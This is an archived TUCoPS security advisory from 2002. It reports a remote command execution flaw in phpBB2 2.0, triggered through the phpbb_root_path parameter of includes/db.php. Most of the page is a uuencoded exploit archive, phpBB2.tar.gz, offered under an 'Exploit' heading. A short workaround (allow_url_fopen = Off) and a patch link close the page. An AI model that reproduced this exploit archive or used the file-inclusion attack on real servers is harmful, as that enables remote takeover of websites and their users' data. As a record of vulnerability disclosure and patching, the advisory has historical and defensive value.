Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: Frequently Exploited :: web5188.htm

phpBB2 is vulnerable to remote execution command



18th Mar 2002 [SBWID-5188]
COMMAND

	phpBB2 is vulnerable to remote execution command

SYSTEMS AFFECTED

	version 2.0

PROBLEM

	pokley and  nullbyte [http://www.inetd-secure.net] found following :
	

	Bug could be found at \"phpBB2  root  path\"  which  is  allowed  remote
	attacker to execute any command  remotely.  The  vulnerability  of  this
	attack start with \'/phpBB2/includes/db.php?phpbb_root_path=\' but  some
	backdoor server are needed to launch  the  attack.     I  did  not  look
	further into this bug. It is tested on most *nix systems running  phpBB2
	version  2.0. Probably all versions.
	

	 Exploit

	 =======

	

	

	begin 600 phpBB2.tar.gz

	M\'XL(``>;E3P``^Q:>4`3U]8/@F!B?4JKUMW+&$W\"DH55E@0A!$%DD444T722

	M#\"22S(29\"1%;7&I;JG6I55QHK?6Y4G\'!?>VF=:E+%?=]HRZUMK6\"5?O4[\\YD

	M(4%<VK[V_?\'UJIF9.^>>>\\ZYY_[.N6<TZ\\WQ\\<$2SE_90*@T(BP,<`\"0183)

	MF\"ML4OO5_@`B0D/#0F2A$>\'!D$P6\'!S\"`6%_J53V9J%HE`2`@UN,1DTIC3V-

	MSJK\',./?(=#?V\\RV]<]4Q26DJOZB.612:7AHZ%/77R:3A3O6/RPX(@+V!`=+

	M91P@_8OD<6O_S]>?9UMY+K>4L(\"1T!C`A&\',#\\_F&6)XX=)Z`P7@7UJ/`1-J

	MP`$VRFPD##0H,!@Q\'H^7$@AH`KXIP@!+2M&6@@)@)<BB0,#PQ3%,!S2HMDA\'

	M$\"2@\"!,&K4EB@+#0E$&\'`:N!U@,X$0@*PG!48\\2\"*$);!,70$GB!H=!\"PN$$

	M#@RTF,?R9W@:#487EGK\"8H138`P9?$L\"*Z8A\"8(&.@.):6F\"+!6#;#V*-XH#

	M!=:2&$IC`-%I!()&0D9+$A/SE+:W**LDT*)&(S\"54L5&,3V*%H-,S(29-!@)

	MAJ;G`&5<6C;(R5*!].PD529(3!ZH`FEQJ2I@P8T81=DD<@H+%<\"A9(QY#\'BA

	MF,?+9G1R\\F:4IJ&1:9LMC08<`U%!/%Y,+,\"T>@(@,6824R#1@\"JE:,PDY&M-

	M.E$TB%7P>\"BN8^<20-OJ\"!QC>\"<E9P\'5D(R!Z<G9(#<]C?G)3`\'I:2`W.2TA

	M/9=G9%<;%.&$%1@*6/MH41R.9.[87BN<E\'E`(=?H(!&/%T0944K/<^R8?CJ4

	M+**TJ!GC_:^]^9_V>YL=_^%%HV$W^U\\PQ[/Q7Q82\'M&(_R&A3/P/\"0X)_P?_

	M_XX6$PO7G.?(P_CQ.?UE0`X0B=TO#+C6:-%AE$2G89PCEO43-8.L:C-*Z^5Z

	MFC9\'221(M!N+8)9%\'YW&1,E97.L#QZE&R2&Z]8%H)7<EAS!MI2\".RD$A1F-X

	MB1!)RL[.4$,TS53\']5>E92,B%VJ#V84P4Y6:GJU2QR4D9#)$#`+&Z&F340$O

	M&*J#%]I`&S&%4\"L\".;@.(PM)P@(A,@\'%3#!.0(\"WQDAL)+P8B7V(AM\"5`DVA

	MEC`2I!SI%<XV!+[0&4H`:C04XG)$B^$T1B(*$%,`L1H4H%I,C@S&2!V*H\\Y>

	MRC`:]@;)8`>4W]W.+)`+\';K;9(<T$F:@HO&J(=EN^\\5@*@04J94CE-F@*Q6/

	M-!<B,\'+JX\"H@P7U#$*#\'#(5Z6HZ$AB*-8YL3D!H(X1M:P=4H=OHG,=W!R\"D;

	MM`.TAILZ,&X(_3\"3F2X5\\IFPIH;!5\"0\"KSL)FB/4$B83#%A/I8-!N%`H&#%L

	M6)3&B.)%4<.\'^VMU+D\\!PF$CHH<\'B/B\"0.!@!N_@**I9GJZ\\6:IALN\'#I,.!

	M7`X$$L&S1O!QS,JH!%W/,3#ZJ<1E`#-2V#.X-<?5830@9F2!OR\\PSS,59\'(6

	M-3;*0-&4T#&1\"/3I`Y,/YK:Q[UEZ.R5UBB=W2OU\'!+/@%$8W+OR3+)X<VMA3

	MQG-S-S<%G3[GJN$S\'5&K=Z=Y4A97I;%1F%:(F*TZ5RQZZD+;>2>D*W-2(7ZI

	M,]/3LY\\S@3NQRQP,,,3H20:7F)\\\"@C0!\'#7!W6PJ91X0@&II`P$QB=V1-F#A

	M9R1EJ+-4`Q-A4HC`Y([6$Q!SS01%(^Q6-BN:A07GK-DH\"2$61`&V)\\:`FRTP

	M&2TU0V(:&T4C=@EHEBPG<R\"<`QUEQ/!\"!HKZ2A$[](5#3\"I!C1;,73CG,$8Z

	MVZ1VC`$@WI$C/V_N^#AE2D)Z>J9S+JF;$!%]FYW:,<IE9E>H#D84,09%4_06

	MNF?O$*]+(&3;\\3!&`@?8;QU**&W^_5P=[/O`106%ZP`;$671F`RT6D/CB)V%

	MK<>I\'^.;%AISC\'4/\'4\\)`\"KVD`5BM(0.4U`T#`)DC(1]\"*))U&R&QY+89H37

	MZC%MD888Y5#`-K+I&BHM)`GCH^-\\TWBPBH(T\"CM;]ZS#L1/4E-EHH&EX.I/;

	MCI@Z3(A(D$``=:9HE_T:\"&0BERUE/Q>A0$]B!?)\\Q+D!8AT#Y`@$50L)_8-1

	M4]CHA\"+8#U,5^UHT)7-`%4.4CR@R8=X3(T$5KOD.&TZ>4,`>6!#$%7Q<=SSB

	MRN.I4`*W..1N@/32:)C\\@!AX.+3@=#,3BICW`0\'-81T?*@3$[)3B9B3E&YJ)

	M,G_6HB]HT.;%:6KB1C1TPT6;OVM<-IZ>(*`9881JSOEL]!1FA!UV!W;,C@`\"

	M5^I1O)#9H?#0+6:@56S;:$*1$QG=O=9I7D9\\.%@\'=Y0<$&8,?UYHL>J9BH*0

	M;_,$$N:=[(A&/L_-7QPQ[GD1G\'5.=AJX_&+D18*]?>4),Q-6[\"`#U]^A3CZ$

	M*]:$F$[AV.D)#B/\'2&S#%/EX,\\OG:#9O=Q?MQ61CQD`<@-[D&O,A`]F+C\'YR

	M?LB+A&\'1%5?@)F$Y2G\\/1T=KWG82Z.@9Z!^QE+O$_S6!$#%@-,=*A\'9<A?_L

	M%Z:ST;0V<[!@\"\\3(GU?CSR?-;FC+NH[DA3SGQ0SCY,QG/5W!7/ZG*^442/+\'

	M)?H#B?JS\\G!\'TQHAUC;%+5=QG`AMPXLF64*ZA8:)1533W\"F&29\"@DZ$PT!DI

	MF,C!O(XY),L1&7,\'H9+`C:7,09_%8NZS#I3L2[XM27\'U$:Z#D@V*0*8`$MID

	MEA\"L1&P%-EC11Q8-7XG=M$:T*-V4-!K`A+Q)\'UP4+M?N\"*P(CNF8DZ:1$CQ5

	M%@$(2A2X)O^..XE_HR#^@$W#@)DPX+1+MZ0QS8#Z$J2:S138S,$E5Q\':;=48

	MK1EIN%PN\\\\_F@T,)\"PR;.K9]91J9*SU;^\"PP0)0\"3N!<8,\",\\:YN-&`IU

	M+\"38[!@P6M!D*4`+40,N;N*:381R?0P(<\">%ISK:T<,M:T9X1QKO%OJ>)SV%

	M:0DHX-\\E/I?[U.5S?%>P?>-H?@F94X9!BZG-!$G;*EY,CZ:4R5N`4&\"U6@6!

	M0$!KS0+7ZIC]JXG<SEIMFTH8EZA.3E-E!X*L=&6*.BL[4Q67RCP,5&<K,T2N

	M[L\'L%QN/&&<$Y+I8UYVO\")XK8\":CBV(V)D7@4<R6<<P-@PEK)\"=+6\\[G`EE<

	M]DC/Y9,893&Z2DW@.).C.08&NIP9`]U-TR@\\UU[685DU$9Y=%3?Y;3,X%1#G

	MXYEV#1P\\1,WITOCR254<=WP#SJ3W_579MFJJTUO9PB@B;B89%B.`J7E*9&)9

	M/IX$C^E1+AI\'N2F<C[M-RV>\\&P(\'1`UGGUUF*VF@,5<;&O!`8$N>F\",%[G)^

	MXCH24ALW.P,&;%W&!TM#^XJ:M2HSK#E+.(S-!(I&+X!;H\\Q6JI4XL-Y67S0S

	M15@F\\6;+N$RU@]*2!C,-C#`QMZ!,;CX`+4&SV$[$Y3PM&0F[;;0P5=<16HL)

	M)BEL#D_!<YC8;F;8H;500B@`#$DL=?-%W6=43ET*!4K\"7$HR]5;`5)=ED9\'A

	M0<%2:?!3Z\\PVIG$0D#+949D86TC0`7:4)4\'+?%+4Z5%K$5`2,\"DE42;$-ZVZ

	M2ICJ-%NL9LO<_X7O;?8ZO[.D_.<Y/MF>\\_T_/#0BS/G_/\\*E4N;[CRPL[)_O

	M/W]\'>WSR\\45.NP&)R8D<#P\\.QP/^X3P^PU%R6K=JQ6OETYK\'Y;5YJ74;WVXO

	M^[9MZXMT[M*^FX@?X\"_D\"P1!P?TB@J1RJ4#0=V\"D7*E*2DX*\"$_/24O,[M<_

	M2<4P\\7BI31O?MKY^+[_LIQ(+Q*K?W1Y_P?%MQ0GSZ.KI@7!:^\'IX^GH\\WLGI

	M\">5LZ<$VAQH>+3R]6GK[M.+R6D.\"]>TX+3P\\/5MX>;9LZ>4%WY;!]QPOWY8O

	M^\\GBO%\\9A/H@Q>V#QT]?T*I7?,V7\'3(/_\\P/T9!O<GD=7^W4N4OO/@*AR#\\T

	M+#RB;V24,D&5V#\\I>4!6=L[@W\"%#\\[0ZK*!0;QA)T982ZZC2T1/>>ON=\\G<G

	M3OI@QLR*6;/GS*W\\]\\)%BY<L75;UZ9JUZ]9OV+AI\\Y:O=NS\\>M?N/7N_J3UR

	M]-CQ$R=/G;YT^4K==U>O7;_Q_>U?[M0WW/WUWOT\'C%X>\'$\\/1VM6+U^H5PLO

	M+T\\O\'T8OCQ96AL#7JZ6?S/OEN$$^:/$K2/#X5NWCIR^H^9+;*R3SYPX:\\C\"O

	M(S_T4N_;C&JL9B^FV)M_2#.G8HUZG>:\\Y.D!%\\_3EQ/+J7KM7NT/_1]&JW;_

	MAY,SH4]43D#BF:5#ICTH>>\\QIU_>C/V_KIH_?^>W(V2_)J_,C3BAKJ\\]FA3[

	MT_2\'JJRA8PYK=F]I=V\'.U_I-YWJO7:7`/GKO7M7(\'8<OT+5?[\"XOF!:[KV\'E

	MLH#E%5F7WDN\\._$-3^&!DL&S_<9=J[R3&J5L<SCKR\\&[`M;6;+I()2_OM#?_

	M^Z$[>F?-O5VILT;/Z+RLSX<KM**1\"1IE-\'YU=<,0[:;X:H\\5D8LO\'E<=$J=Q

	M5U1M\':D.VO^A?-\"ZBJ*`ZX].+-[[R[JTB$Z[-ZY\'BQZ]6B8=._)Z-1YZXOX[

	M1V9TJE<L/+]!?.G<^ZK<U<?$H9%S6MZIOO!0U^8_N[=;`E:-CBV>N:ZD,,S0

	M=XM?QMMO8&L/M<TK._#56?\\X?+%)&]E[RYX+YV,/#7YG^Z7K?&75]8$CSJT9

	MX7>L[9+8Q9IA^=43T*[Y)2LZ5&Y+72\"(7\'9T[,_)OVG7#UB4VFECQ>K^#^;&

	M;GZT]VY8YQ]%BW3:9?554\\M50T0!;2ROY44FGACQR=U?EUD[#O;ZY<+!ZMEW

	MVO&77E5O!G73M+<R?K@F7NA/<L(^3;I<%;[QK&;>@FF?^81.K])NJN\\NO\\\'[

	MSQDR65[V:3^I5\"3G+?[I5+URXJW4`YU]>JU0A7XE&[^OI(-H^(??%$_:REWB

	M.[54L%Y91/3^[HN$[TOY]9[\'%TZ-^#C_7\\D_W<@S+WEE3WE%;-G6C8\\Y>>M*

	M)L7<3STZ)F%E]JX@D[=?UJPQO_14+T[MYO=JIRK-N,1-GI4S3-0`:T\'-E$G?

	MR09BRWN/#,_/J\'SMV*1JV:\"(#NB]FSFZL&TY^W5[ZBX6+%^9,B8L<,77B=NH

	M\\^O6U,P[@[U[+@ZL;C]I[-RO$VYOZOK9KV]DK.G`:W6E=F$%\'77T]\'>3*ZJ\'

	MK[Y<FGQC:D,]43ZV+J_V\\YL\'>S[DY!X<G!#2S7J@K.NE;^]W7+?JP9URZ)3M

	ME9=1]3U90^\'[PS8$&M\\9^]WIG@\\]#\"G9@S[*.]TV13^V/J\\6W[.J1\\KY0MV8

	M]L8\\J3YP[ZW`Z6,OI%1>^TR/S3TRH=OXM0TMMJ1ZRR@B5\'>G_42I8IRNR\\[5

	M$]=\'W__WQ,3NFPOZ\\L:1.^]VV!Y]\\OSLP#.3M\\I.5\".?3[T<VV#E=2M[_?C#

	M*8=._JMH7NKL/,N!;23WXUWQF:I\'H0>Y\'8*F\'):-:QN7VWO)4EYN=%]\\U\\%U

	MIWXLUPXIHN,M2[O.V]&Y.G+0@-YW-WO=J5V>GR]N%7?O6,\',\"<>7IT2,*!JR

	MZV)]UY#\"%84\'/[TX(2O9+VQXY=:+U63JV87==SX8_N4\'GC.);>4+>2NJAIY1

	M7[UZZ#YI[=%`UGDK*_?UNQS?;OK4=0/\"W]A3(5@K7\'%DYT!J5:\\%RST5QDGI

	M_5HMN]9OYXPCQS\\X$>2\'+Y^L.W2K:%[[3U/WJF;<>LSAX?OQ\'WW\"1-&OZV:,

	MX]15%K<(,\'1_U^#M*;QU:\\\"KFU<*9AU_?>:5SBU_FY&VQ&=\'78]M1R;XW`VM

	M>WO`HKS5TSI>?V.G4<J/J*WRG;5K;)<-WY\\T39G<T&/]D#?+O30K@[I5+.0W

	MG*SLM;YDI??H^7FGUKX;.*QF;[7.OWC\".]VG&/+RW_[JXXHIV;<^N1&J-WTR

	MR?/-8%\'K7/\'2?F\\59VR7?[S`ND(S>=$>K$/FB#9Y)0>RYS2$\'6F/(EL_JFR\'

	MF^6&<GGZZ$I.\\><G%N?/>__Z[DK]!\\JWM+<&E8[1U/5015V\\\'#.Z,ON23^W:

	MO(!YU(\"LM=??ZS*Z(GYW9TV_#O76\\MBZH;5C[0[6;D#-GIJ:+[`K)T\\<?M3U

	M,6=Z8?)CSJJ^8^L]TGJ^(JL^43/I3LQ0]<,N1QYM7_\"8<[@HJ>>T77/JWKVU

	M2_9H6ML>\\[?FZ?&`_1\\<FU=S;]#V2\\O\']_CD\\/3YX7T\\)]=-\';N8>O#PA[S1

	MVV?-V3^F-B6I[K7II\\9,>)\"SM?7\\-1>&\'?C(RYQ^).91!9\'[^;3!M<KWAER:

	MG[+5?U^7VZMOSS]2OT)TO:\'#REMGOZC=OR6A9GCRK\"D\'3XU_=&/Y1N5OBOM7

	MVLSY\\&IB]U9R_[KCM_=Y)EX1[O!>,[OLW*+*-Y8^#/XVZ)4>*S^N6\'R_H3`Q

	MI,T/7<RG*HO/_M3)N_IK/WG1W\'7;`W98?+PW?+)U</?293.[1&KY![C\\KRH7

	M\\C^KEW\\3>;I3056Z=-#[(ZL6I&L&SP[=T3LG9,*A(\\J]Q>#-LZ]6;/$X<W3^

	MR)M3R[NM[[9K6-5;\'6]N_E;=3YX:1Q\\ZDZ!Y>[SG3WL?7KF9>4[])>IY^M0F

	M\\L+-JSU_.?2@[=VBSIW.)Z5$[-E>-7Q?;DW&E`O^YR:U/QLQ,\"$V;TV+Q/+5

	M[1<4C_/VSPCO?VWUGG,;^(_N/\'C8,O7\';^/B!OU?^_7^#-<5!P#\\3J<T2I%8

	M-:U7A6(W1$@J06.K;$*4K=JL5:S7Z$:0>-,$VQGCF<2UE%B/2*]DO<*FI=6$

	MR5J--]DHQ9)$@GC5:ZW\'M;O<7OVQ_T!_.9_?SCESON<[WS-S\'C!7]YC1H3/<

	M+/+F8*HCKPC96*F\\ZDPR6_!P(_AI-LVVQKJM7BK,#@Y<>S;`AI3>]PFI,&!T

	M]B?V:5D5V<8(Y\\I,DAT*T^G\'A^/]6OGD#\">MU>PDX_2+21\'<OE+OZ+2:$,>9

	M])U:7V<U@W`3SUB$$T@F?BZ3#;?06(.L7AL=YX_F5V4R&L>3IG@!?YOW55^T

	M(#[F0LB$HS?Z\\9/2\\L;34>U#F0N-=CWU$;82#B.F)_3J\'*^18B8Q$M5L/GCK

	M$:_\'&KK=.X>$NA;4Y[4]\'T&R3%WFM3U9L]).1L5O\\#5DL-5DT[`ADG,#4GVH

	M+Z(&T[L(0?\':>JIPR=Z,C-9&CTMR6-_<#4UJ/?9\"KXBY17R3FJ6M5;\'CV\'%G

	M7F6%BIAB$\"\'KAR]S?)1&5J&-,_Q[BL^(91TREP>059BJIKW:77ZI>UN?\\:U$

	MW@FWM<`+R8RH]3LWSUH$&>Y^</EN\'%U\\JMGN\',IDG*\\(_?&69F53PL1/<3OR

	MZ3+\\:&C9KS+<M<0@\\1\"%^K!ZO(B)+%DI2%,R_%TPBU\\9+\'HP>N5GU?:)8DG2

	MD2JX:69.7W?-BT(.5?]#UNF)0?DC:\"2=<\'-)3+*N;-K\"H.ZZ^Z*.XM)IW9($

	MOFERGO,-_]EKAY_DFM.\"*OZTK86?TK),WB8L\"\'H:XM:OBQZ\'SXP^]7M$LK0Y

	MB4&IPX(W7J[*.DSAEMP,7YBB[<]9CI7V__X7ZFR#00-\"$7\\<@^3V&ATJ#,T4

	MI[\']\\H.6>76O@5!T?$9#V$M5#)!W\\9F3I(OH>1N_4]81<K5RUVG17/#B#DKP

	M\\NSQ\'^\"EJ5@;.W[RKOI4R`P&G:/5KP=SO@A(?D?=Z<,`LD1FCO002L<+]PE2

	M]O/K>6@S!BTO2A5&X3P?C^BC2`9%;IH(RU=SB;$N0V,U+R<U4XZ6L`?:-?8>

	M8=!V?,-ZSF0_!N4L]\"D;2A;\'S$SV9.95!6<S)=H!?,OLJ=?+C8?LT?G]<H$\\

	MC*(C]#9@3Z<=(F_.X_F:(WFTHIR$NM,#KZI@8299:H!!O>3]9UQ\\>ZAV[S%[

	MEAV[AS\'($,F]3-0B%10O4]%O&%TOV9`:N[L2KY2GH1)5$K&+02WXI%SS7Y3L

	M+$M&T4];>8+TO[?Q+DZ:RN-R6!/?T-L8%(GD6K@77EG.5^CDXQ7L<$Y?LL`+

	M&6:E(-;&P*@KV\\%J7TPA^\"J)=5.TDN2OC&08A!^)VWWXHGKI>X+VE8.0N<0,

	M\\0G4&M[-PZ-6XSFXX[FRR%(]/\',J/DSZ_C!_E!05JXV:_<H5M$@K97$\'Q5Q9

	M]TDD3Z>V8U#UOT$VD-1[#1$P!F6<7&Q\\S1X[B,2$>;[L[Q;IB4P6=_O2$7VT

	M:Z5..6;R/N%KI%AH7U#:S,7$_]>G#0````````````````````````````#^

	*XQ\\@`:;X`%``````

	`

	end

	

SOLUTION

	 Workaround

	 ==========

	

	In php.ini, dissallow remote URLs :
	

	allow_url_fopen = Off

	

	

	 Patch (19 March 2002) 

	 =====

	

	http://phpbb.sourceforge.net/phpBB2/viewtopic.php?t=9105

	

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH